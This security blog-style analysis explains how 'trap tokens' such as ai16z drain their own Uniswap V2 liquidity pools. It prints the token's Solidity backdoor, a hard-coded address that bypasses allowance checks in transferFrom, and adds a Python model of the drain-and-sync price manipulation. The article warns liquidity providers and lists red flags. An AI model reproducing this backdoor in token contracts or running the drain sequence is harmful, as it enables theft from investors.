BEWARE! Trap Tokens Are Coveting Your Wallet and Have Already Rug-Pulled $782K From Degens in 10 Days!
Understanding Mechanisms and Victims of This New Exploitation Trend!
What Happened?
A new type of exploitation has emerged in the market: trap tokens rug-pull the assets in their own liquidity pools shortly after issuance.
How Does the Rug-Pull Process Work?
Look at the token flow chart of this rug-pull emptying ETH worth $33.5K.
The creator of ai16z authorizes the bot contract to manage the ai16z tokens in the Uniswap V2 pool. This action shows that the ai16z creator and the bot contract belong to the same entity, since only the owner of the ai16z creator can grant such authorization. (Not shown in the token flow chart)
1. The bot contract invokes the ai16z token's transferFrom function to remove 68 million tokens from the Uniswap V2 pool, shown as Step 0 in the chart above.
2. The bot contract invokes the Uniswap V2 pool's sync function to update the pool reserves. Because the pool prices trades with the x * y = k formula, shrinking the ai16z reserve sharply increases the exchange rate of ai16z against WETH. (Not shown in the token flow chart)
3. The bot contract invokes the ai16z token's transferFrom function again to transfer 68 million tokens to the Uniswap router. This triggers the ai16z token contract's own code to swap 10 million ai16z tokens, an amount decided by the internal mechanism of ai16z, for 13.56 WETH in the Uniswap V2 pool. Because of the intentionally inflated price of ai16z, this single swap takes most of the WETH in the pool and sends 13.56 ETH to the bot contract. The swap also updates the pool's reserves, which collapses the price of ai16z against WETH. (Steps 1-7)
4. After the price manipulation, the 68 million ai16z tokens can only be exchanged for 0.00000000000010677 WETH, which is sent to the "from" address of the transaction. (Steps 8-11)
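To make the pricing step concrete, here is an added Python model of a Uniswap V2 constant-product pool (this is example code written for this page, not code from the article or from the ai16z token). It compares an ordinary sale with the "transferFrom out of the pool, sync, then sell" sequence described above; all reserves and amounts are constructed for illustration and are not the real pool's.

```python
from dataclasses import dataclass

FEE_NUM, FEE_DEN = 997, 1000  # Uniswap V2 charges 0.3% on the input amount


@dataclass
class PoolV2:
    """Minimal Uniswap V2 pair: balances held vs. cached reserves used for pricing."""
    token_balance: int  # tokens actually held by the pair contract
    weth_balance: int   # WETH actually held by the pair contract
    reserve_token: int  # cached reserve x
    reserve_weth: int   # cached reserve y

    def sync(self) -> None:
        """Public and permissionless in V2: reset reserves to current balances."""
        self.reserve_token = self.token_balance
        self.reserve_weth = self.weth_balance

    def swap_token_for_weth(self, amount_in: int) -> int:
        """getAmountOut() from UniswapV2Library, then settle and refresh reserves."""
        amount_in_with_fee = amount_in * FEE_NUM
        out = (amount_in_with_fee * self.reserve_weth) // (
            self.reserve_token * FEE_DEN + amount_in_with_fee)
        self.token_balance += amount_in
        self.weth_balance -= out
        self.sync()
        return out


def honest_swap(reserve_token: int, reserve_weth: int, amount_in: int) -> int:
    """WETH received by a normal holder selling amount_in tokens into the pool."""
    pool = PoolV2(reserve_token, reserve_weth, reserve_token, reserve_weth)
    return pool.swap_token_for_weth(amount_in)


def trap_drain(reserve_token: int, reserve_weth: int, removed: int, amount_in: int):
    """A privileged transferFrom pulls `removed` tokens out of the pair with no
    allowance check, sync() re-prices against the shrunken reserve, and the
    same-size sale now takes a far larger share of the pool's WETH."""
    pool = PoolV2(reserve_token, reserve_weth, reserve_token, reserve_weth)
    pool.token_balance -= removed  # Step 0: tokens leave the pair contract
    pool.sync()                    # reserves shrink, token price jumps
    out = pool.swap_token_for_weth(amount_in)
    return out, pool


if __name__ == "__main__":
    # Constructed pool: 100M tokens against 14 WETH (WETH counted in millionths).
    fair = honest_swap(100_000_000, 14_000_000, 10_000_000)
    drained, pool = trap_drain(100_000_000, 14_000_000, 95_000_000, 10_000_000)
    print(f"normal sale of 10M tokens: {fair / 1e6:.3f} WETH")
    print(f"after removal and sync:    {drained / 1e6:.3f} WETH "
          f"({100 * drained / 14_000_000:.0f}% of the pool's WETH)")
```

The liquidity providers' loss is the difference between the WETH the pool held before and `pool.reserve_weth` afterwards; the tokens left behind are then priced against almost no WETH.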
Such an attack is possible partly because the bot can skip the token's allowance checks. Checking the code of the ai16z contract, we can see that the bot contract's address is intentionally hard-coded so that it avoids the allowance subtraction. It is also set up as the wallet receiving taxes.
    // Hard-coded bypass: when the caller is the bot contract and the amount
    // exceeds the allowance, return 0 instead of reverting, so the allowance
    // check in transferFrom never fails for this one address.
    function sub(uint256 a, uint256 b, string memory errorMessage) internal view returns (uint256) {
        if (b > a && msg.sender == 0x586D823BE41cd8daD71302a79440D8a07f9CAee1) return 0;
        require(b <= a, errorMessage);
        uint256 c = a - b;
        return c;
    }

    // Looks like a standard ERC-20 transferFrom; the bypass lives in the sub() call above.
    function transferFrom(address sender, address recipient, uint256 amount) public override returns (bool) {
        _transfer(sender, recipient, amount);
        _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance"));
        return true;
    }

    // The same hard-coded address also receives the trading taxes.
    address payable private _taxWallet = payable(0x586D823BE41cd8daD71302a79440D8a07f9CAee1);
Who Suffers the Loss as Victims?
Users who add liquidity to the pool are the victims of this trap-token rug-pull scheme.
What Privileges Does the Bot Contract Enjoy?
1. The ai16z token contract authorizes the bot to take the ai16z liquidity out of the Uniswap V2 pool using the transferFrom function. Users should consider such operations as red flags.
2. The bot is set as the wallet that receives taxes when users trade ai16z tokens.
3. The bot is allowed to bypass the transferFrom allowance restrictions. The implication is that the bot can move any address's tokens without authorization, meaning it can drain any address's ai16z balance if it intends to. This enables arbitrary price manipulation, as shown in this example.
Any Other Examples?
Click these top 5 trap token transactions ranked by damage amount.
You may have noticed that most trap tokens are connected with popular memes.
How Big Is the Damage?
Over 10 days, such trap tokens have rug-pulled $782K from the market.
What Should Users Do in Daily Trading?
Traders should STAY AWAY FROM tokens whose code has not been audited by credible services. And don't be too eager to jump on the bandwagon of hot meme coins!
Wanna see how other exploitations create damage to the ecosystem? Click this link or open https://bit.ly/hfdefi to visit the latest booklet: Head First DeFi, Decoding the DNA of Crypto Transactions & Strategies.